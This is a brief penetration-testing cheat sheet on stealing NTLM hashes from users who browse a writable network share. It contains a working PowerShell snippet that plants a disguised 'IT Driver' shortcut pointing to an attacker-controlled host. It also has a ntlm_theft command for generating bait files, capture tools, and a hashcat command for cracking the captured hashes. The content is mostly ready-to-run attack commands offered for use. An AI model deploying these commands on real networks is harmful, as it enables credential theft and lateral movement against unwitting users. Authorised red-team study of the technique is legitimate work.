NTLM Hash Theft

Theft Files

---

Any writable directory (shares, nfs, locally) where users will list contents you can use certain file types to steal hashes

Manual: (.lnk)

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("\\DC01.domain.local\OpenShare\IT-Driver.lnk")
$lnk.TargetPath = "\\<AttackerIP>\@ico.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "IT Driver"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Automated (multi-type):

https://github.com/Greenwolf/ntlm_theft

Generate all file types:

python3 ntlm_theft.py -g all -s <attackerIP> -f '@myfile'

Monitor for traffic with Responder on linux or Inveigh on windows. Hash received? Try to crack it

hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt

OR: Relay Attacks

Poisoning

---

• LLMNR Poisoning
• IPv6 Attacks

Relaying

---

• Relay Attacks

Misc Locations

---

• https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/